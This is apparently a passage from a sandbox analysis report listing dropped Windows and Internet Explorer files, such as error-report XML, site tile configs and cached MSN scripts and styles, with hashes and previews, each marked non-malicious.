Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.6.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD747.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4771
Entropy (8bit):	4.482801129791895
Encrypted:	false
SSDEEP:	48:cvIwSD8zsziJgtWI9bDWSC8BN48fm8M4JkjMFZ+q8v5jMKJYegd:uITfzwcySNb1JyAKdMqYegd
MD5:	8AFBC5F8CBB6A318174591651A165D27
SHA1:	4B0E1BB0E078024BADF32FFB8DC00E8CB7BF2EF7
SHA-256:	BC2B2A6916EC74B3161784D8F82E94B0B6595C03BA1436BA6F8E38C16040B238
SHA-512:	93E2591A29BCF08DF6437773460AD7019A8D74DC9C19624CE4E4A6CA4FA9978E6C377A6BED2C2B862BCD0A62C0C007A971EB1BCFC18317DF6F5667687332BDF0
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1192944" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DURNCK2N\www.msn[2].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\QALADACS\contextual.media[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2759
Entropy (8bit):	4.955988025132615
Encrypted:	false
SSDEEP:	48:L3k3k3k3k3k3k3k3Kk3kikikiksksksksKyksKy3ksKy3ksKy3ksKy3ksKy3Z:DeeeeeeeKennnppppKypKy3pKy3pKy3x
MD5:	7A621B97EA230B91CE024A98F23067DD
SHA1:	33E53F5F9EF9204539FA7ADE1255962C0F9C91E3
SHA-256:	5509DC233659332D67A391AF11CF6D63EA9C5BB98DA702A73CB093BE451CFF9E
SHA-512:	C9E83596C38E581C6961458AD71AADDCF656FA391C3F979430228731AFDB1826C87F991EE87E70E152F7ABE604EA63D46A238F746183167438A3C62DA28C1C9E
Malicious:	false
Preview:	<root></root><root><item name="HBCM_BIDS" value="{}" ltime="3649165088" htime="30914547" /></root><root><item name="HBCM_BIDS" value="{}" ltime="3649165088" htime="30914547" /></root><root><item name="HBCM_BIDS" value="{}" ltime="3649165088" htime="30914547" /></root><root><item name="HBCM_BIDS" value="{}" ltime="3649165088" htime="30914547" /></root><root><item name="HBCM_BIDS" value="{}" ltime="3649165088" htime="30914547" /></root><root><item name="HBCM_BIDS" value="{}" ltime="3649165088" htime="30914547" /></root><root><item name="HBCM_BIDS" value="{}" ltime="3649165088" htime="30914547" /></root><root><item name="HBCM_BIDS" value="{}" ltime="3649165088" htime="30914547" /><item name="mntest" value="mntest" ltime="3653645088" htime="30914547" /></root><root><item name="HBCM_BIDS" value="{}" ltime="3649165088" htime="30914547" /></root><root><item name="HBCM_BIDS" value="{}" ltime="3656645088" htime="30914547" /></root><root><item name="HBCM_BIDS" value="{}" ltime="3656645088" htime

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{12F148CB-23E7-11EC-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	24152
Entropy (8bit):	1.755356822457149
Encrypted:	false
SSDEEP:	48:IwQGcprpGwpL6G/ap8QdGIpcQcn5GvnZpvQcXGvHZp9QcZGoDiqpvQcpGo43GKpT:rUZDZg2KWBmtOf37tw3GKWIDu6
MD5:	6B1CD61A2DECD6A2651A7EB6F93565FD
SHA1:	2600BC105088AA362D5E15C7F2F40F6A1FB6BF29
SHA-256:	D768ADAB7F2A7607EFC428E359248AE9AAA3B44DC2E2BEB1402137F02272B0BB
SHA-512:	567C29F5BEE59DB4A5EEB55AB1392B93F0060938996A55475A297D77C45E6B5F26BB97832D8151155BD4D02D1ECCE4428A0E9636760950627B57FA08C1AE60A7
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{12F148CD-23E7-11EC-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	366512
Entropy (8bit):	3.6309016530480616
Encrypted:	false
SSDEEP:	3072:EZ/2Bfcdmu5kgTzGtNZ/2Bfc+mu5kgTzGtFZ/2Bfcdmu5kgTzGtcZ/2Bfc+mu5kB:9CnfE
MD5:	0A77E0808CAE3317D8D52235809501A8
SHA1:	D353527A68F2FBF94A27DA4F4058D8A520410CE2
SHA-256:	972017B7B001014486C2F10F3833CDCB0128FFDAFAFE901F0B2902BECAD36FC4
SHA-512:	FE811A7826BDD534F1BDCB9373DC3AC5C8AC0F4F5A6555058C1180C3B5FEB9932268127EC276F2376045D4EE1FA5F26F25B64D30408E8B6A3F58713BE2169204
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	657
Entropy (8bit):	5.052815764482474
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEtvorKJ0vorKanWimI002EtM3MHdNMNxOEtvorKJ0vorKanWimI00Oe:2d6NxO6i80ivSZHKd6NxO6i80ivSZ7Qb
MD5:	384C5DC5722367CE6E09722CF6D01B1A
SHA1:	EC370552D0558CEFE4DAB1B109EF413DA973D26F
SHA-256:	9CED3F7758551ECEFB2B46930EE3E605FE86B3B827E41C57B7E53F2F6055DD82
SHA-512:	D795206B927A61379A980C44D78E8C90B6892291B26B762ED2B203736700ED31CA7DA07093F7022FCCAF911435065BBBE84429815B28376D3799D3362A2F1FCE
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xeadc7c46,0x01d7b7f3</date><accdate>0xeadc7c46,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xeadc7c46,0x01d7b7f3</date><accdate>0xeadc7c46,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.082254164384245
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2k9rKJCrKanWimI002EtM3MHdNMNxe2k9rKJCrKanWimI00ONkak6Es:2d6NxrC8EvSZHKd6NxrC8EvSZ72a7b
MD5:	DBDD3332DA9C2B2DC69C5F12CFC2BCC4
SHA1:	A33A9B02A8034B550182DC96A66330743917A02A
SHA-256:	CBA61CEF1EE1BC9D4B36C95482C0FC946DE052A6D451D8549C644B1A3B3F0C85
SHA-512:	F6B999C0541B35B480B93ADB36B9E5623EBA5259F26297BC79EF95647C985D9705257B0A4ED98B32EAD33DB768BA0B204F2535351435F47D676638D8A69FEAEE
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xead553a6,0x01d7b7f3</date><accdate>0xead553a6,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xead553a6,0x01d7b7f3</date><accdate>0xead553a6,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	663
Entropy (8bit):	5.06634278804547
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLorKJvrKanWimI002EtM3MHdNMNxvLorKJvrKanWimI00ONmZEtMb:2d6NxvEr8vrvSZHKd6NxvEr8vrvSZ7Ub
MD5:	B7AACB0D331A591E6731C7CB1E73EC1E
SHA1:	C6C9B532D6FF91085D76D67976C3CBF4C2230F2D
SHA-256:	E0FDAAC866A62A948D53287C4848BE972B52FADD2A32944ECC3B3F0E69B2181B
SHA-512:	CE2EA7CEA1A215679212A55CF27DC4B8B813BFC098A08A82DB224DA99E6BC759DF38FAB3F18D03851BA973EE1B77C28CF9CE1B6BC2023E0206356EBDF023C7DB
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xeae3a204,0x01d7b7f3</date><accdate>0xeae3a204,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xeae3a204,0x01d7b7f3</date><accdate>0xeae3a204,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	648
Entropy (8bit):	5.067411186221503
Encrypted:	false
SSDEEP:	12:TMHdNMNxitvorKJ0vorKanWimI002EtM3MHdNMNxitvorKJ0vorKanWimI00ONd/:2d6Nxwi80ivSZHKd6Nxwi80ivSZ7njb
MD5:	FEFF828CB5EF17755ACCF6D7123FC135
SHA1:	21F545AA6E6F09D70B11CE7C1CE5A6E3ABEC064C
SHA-256:	FBA7DB0A6B2691C1B4B911FCF8C8DD26AF8DD7FF94CFC00EA3120AE631C55D9E
SHA-512:	AF5AA85F4733AB457F309E5ECD4DF8381F30C1D4C542E74313CED66CBDFB30BAAEE036C485266B1E92AB6DD8292DAD6DB726439B745F95E6F148ED3F4B1F8EFB
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xeadc7c46,0x01d7b7f3</date><accdate>0xeadc7c46,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xeadc7c46,0x01d7b7f3</date><accdate>0xeadc7c46,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	657
Entropy (8bit):	5.078054068098074
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGworKJvrKanWimI002EtM3MHdNMNxhGworKJvrKanWimI00ON8K075t:2d6NxQhr8vrvSZHKd6NxQhr8vrvSZ7uV
MD5:	9132D7B7EC2183C8A44282A3985FED33
SHA1:	54DBCE362FF6B4248873F0225179AC0D7BB4DFB3
SHA-256:	EABC18B1914655BB8B585FB0B8694189672CBE92ADB8D1C1A5BCCBFEE7753592
SHA-512:	C6C31EF2A7EDF334CBFB04761E9710216114A0DB80469643176A434C56AC1C6E9738125965C4600CEB1BFB4E3CA2EB28B7C1A2227A0D731E4A20E0B22F145C98
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xeae3a204,0x01d7b7f3</date><accdate>0xeae3a204,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xeae3a204,0x01d7b7f3</date><accdate>0xeae3a204,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.053827096226792
Encrypted:	false
SSDEEP:	12:TMHdNMNx0ntvorKJ0vorKanWimI002EtM3MHdNMNx0ntvorKJ0vorKanWimI00OV:2d6Nx0ti80ivSZHKd6Nx0ti80ivSZ7Vb
MD5:	C26C2CB14FBA28D51BAD5F31B2F8C505
SHA1:	C80FA7002ADA2BB67499A252CAA84BC33BE5D6A6
SHA-256:	4C8986F850775A0A53EA6FF0E695260F3B9D259CB7ABF5A59AC6C3E864C5586B
SHA-512:	7132B43D789F7D26D4365B4A1DD5411CCD6A9E0F7C248D402F0B6F64BF38723F3B0A461F7B6E33DB7D7E6B43B1E4B422ADC7604B97C198458D4A4987EBA48D45
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xeadc7c46,0x01d7b7f3</date><accdate>0xeadc7c46,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xeadc7c46,0x01d7b7f3</date><accdate>0xeadc7c46,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	657
Entropy (8bit):	5.0923907161400574
Encrypted:	false
SSDEEP:	12:TMHdNMNxxtvorKJ0vorKanWimI002EtM3MHdNMNxxtvorKJ0vorKanWimI00ON6z:2d6NxHi80ivSZHKd6NxHi80ivSZ7ub
MD5:	295DD803EA4E3B949E60D5CBC9D0B448
SHA1:	78877AD5920D2F673947678E1BF2E149D0FE46D5
SHA-256:	86C26221921FD969424F4AFAEF6A447A614998CD1E04E790ECC11BD0025FB754
SHA-512:	CB6C33A98010141C533C933901FB070B9F60CCCCF1AEB5FD48A9278B81508A821DFE39160CB12814B04A0E3B4E4B0833C979B12C2B4973E62A43112DA8C8CC61
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xeadc7c46,0x01d7b7f3</date><accdate>0xeadc7c46,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xeadc7c46,0x01d7b7f3</date><accdate>0xeadc7c46,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	660
Entropy (8bit):	5.071560009488996
Encrypted:	false
SSDEEP:	12:TMHdNMNxc9rKJCrKanWimI002EtM3MHdNMNxc9rKJCrKanWimI00ONVEtMb:2d6Nx68EvSZHKd6Nx68EvSZ71b
MD5:	7E19D2FEB8237D3862DA46C9644000F3
SHA1:	2DD90D3A95394E2233BC129C834DA608AAB5CF23
SHA-256:	4EDBFD31F43188CBE32AA39EF9B2AD6D5A2DB87AD5B535FB32DF07B8B2032D88
SHA-512:	DE53421282E51D5F4686AED0D28C7447D58DBAFFBE6029A320AD9C88778DD2CF69F1557B33679166F95904B678C24DE78B9FAF7870ADDA35FCAE288011034BF3
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xead553a6,0x01d7b7f3</date><accdate>0xead553a6,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xead553a6,0x01d7b7f3</date><accdate>0xead553a6,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.053071962416116
Encrypted:	false
SSDEEP:	12:TMHdNMNxfntvorKJ0vorKanWimI002EtM3MHdNMNxfntvorKJ0vorKanWimI00OE:2d6NxFi80ivSZHKd6NxFi80ivSZ7Ejb
MD5:	D3CB073B6C070D6C5B915B9402F946AC
SHA1:	5E61D458CA89937F35AE8D232EC9214A8E36F93B
SHA-256:	88A33D03DD1ED704625BF62CFB8AA2C0B17D2B214E350C03610251F52AA5BDB5
SHA-512:	872C5966CBAE1857B1D8BB1A9A47A394E090748DDB8C50D6C082F7DA4B072D3FB2F2C9C577DCEFE313B618D665E9393106054F9BD7A980BE11A8B6F8EB52D2D0
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xeadc7c46,0x01d7b7f3</date><accdate>0xeadc7c46,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xeadc7c46,0x01d7b7f3</date><accdate>0xeadc7c46,0x01d7b7f3</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\dikxvqf\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	7.033577064751242
Encrypted:	false
SSDEEP:	24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGC:u6tWu/6symC+PTCq5TcBUX4b4
MD5:	7925B39EB6CB6FBC72EA5A7A98916B4E
SHA1:	1E05BEB8F684ABEA95FAC3E089CCF08181B14BD9
SHA-256:	4E4063E7A83052792E8014681C7B1F0421616AE11419ED49D030363BAAD31767
SHA-512:	193696F394FA2F69757537D5E2A75D64B98C1CC54D4D6F5EC0AD92C5FCEEED3E746E3D55D8D46F666B4EE6AFFC5FDE3FD56DD1F75206E4E1F1A938A6B4B5C741
Malicious:	false
Preview:	E.h.t.t.p.s.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D..M..............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q\|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq\|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... .............Ya......Ya....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\17-361657-68ddb2ab[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1238
Entropy (8bit):	5.066474690445609
Encrypted:	false
SSDEEP:	24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
MD5:	7ADA9104CCDE3FDFB92233C8D389C582
SHA1:	4E5BA29703A7329EC3B63192DE30451272348E0D
SHA-256:	F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
SHA-512:	2967FBCE4E1C6A69058FDE4C3DC2E269557F7FAD71146F3CCD6FC9085A439B7D067D5D1F8BD2C7EC9124B7E760FBC7F25F30DF21F9B3F61D1443EC3C214E3FFF
Malicious:	false
Preview:	define("meOffice",["jquery","jqBehavior","mediator","refreshModules","headData","webStorage","window"],function(n,t,i,r,u,f,e){function o(t,o){function v(n){var r=e.localStorage,i,t,u;if(r&&r.deferLoadedItems)for(i=r.deferLoadedItems.split(","),t=0,u=i.length;t<u;t++)if(i[t]&&i[t].indexOf(n)!==-1){f.removeItem(i[t]);break}}function a(){var i=t.find("section li time");i.each(function(){var t=new Date(n(this).attr("datetime"));t&&n(this).html(t.toLocaleString())})}function p(){c=t.find("[data-module-id]").eq(0);c.length&&(h=c.data("moduleId"),h&&(l="moduleRefreshed-"+h,i.sub(l,a)))}function y(){i.unsub(o.eventName,y);r(s).done(function(){a();p()})}var s,c,h,l;return u.signedin\|\|(t.hasClass("office")?v("meOffice"):t.hasClass("onenote")&&v("meOneNote")),{setup:function(){s=t.find("[data-module-deferred-hover], [data-module-deferred]").not("[data-sso-dependent]");s.length&&s.data("module-deferred-hover")&&s.html("<p class='meloading'><\/p>");i.sub(o.eventName,y)},teardown:function(){h&&i.un

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\2d-0e97d4-185735b[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	251398
Entropy (8bit):	5.2940351809352855
Encrypted:	false
SSDEEP:	3072:FaPMULTAHEkm8OUdvUvJZkrqq7pjD4tQH:Fa0ULTAHLOUdvwZkrqq7pjD4tQH
MD5:	24D71CC2CC17F9E0F7167D724347DBA4
SHA1:	4188B4EE11CFDC8EA05E7DA7F475F6A464951E27
SHA-256:	4EF29E187222C5E2960E1E265C87AA7DA7268408C3383CC3274D97127F389B22
SHA-512:	43CF44624EF76F5B83DE10A2FB1C27608A290BC21BF023A1BFDB77B2EBB4964805C8683F82815045668A3ECCF2F16A4D7948C1C5AC526AC71760F50C82AADE2B
Malicious:	false
Preview:	/! Error: C:/a/_work/1/s/Statics/WebCore.Statics/Css/Modules/ExternalContentModule/Uplevel/Base/externalContentModule.scss(207,3): run-time error CSS1062: Expected semicolon or closing curly-brace, found '@include.multiLineTruncation' /....@charset "UTF-8";div.adcontainer iframe[width='1']{display:none}span.nativead{font-weight:600;font-size:1.1rem;line-height:1.364}div:not(.ip) span.nativead{color:#333}.todaymodule .smalla span.nativead,.todaystripe .smalla span.nativead{bottom:2rem;display:block;position:absolute}.todaymodule .smalla a.nativead .title,.todaystripe .smalla a.nativead .title{max-height:4.7rem}.todaymodule .smalla a.nativead .caption,.todaystripe .smalla a.nativead .caption{padding:0;position:relative;margin-left:11.2rem}.todaymodule .mediuma span.nativead,.todaystripe .mediuma span.nativead{bottom:1.3rem}.ip a.nativead span:not(.title):not(.adslabel),.mip a.nativead span:not(.title):not(.adslabel){display:block;vertical-align:top;color:#a0a0a0}.ip a.nativead .captio

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\52-478955-68ddb2ab[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	396806
Entropy (8bit):	5.324117607788422
Encrypted:	false
SSDEEP:	6144:YXP9M/wSg/jgyYZw44K7hmnidDWPqIjHSjaICr1BgxO0DkV4FcjtIuNK:CW/VcnidDWPqIjHdB16tbcjut
MD5:	A01F715D94D664BFFD387E3EB04AE159
SHA1:	5E80CAB36F0E0CBE231C8E85D5D0E591FDF0107D
SHA-256:	7959B1DA9C26C84C6D6FC46614D53C1BC095676AC21CEA64B58166D6E5198458
SHA-512:	8F77BB672BADCC0D36C92C3D9A35B01CFEDC5684BAB0F7626D8256EB068F2C0556903E4548EDB06E1965968CDBEC1632FBAA67C6ED1046EB204DF1DD01859FBC
Malicious:	false
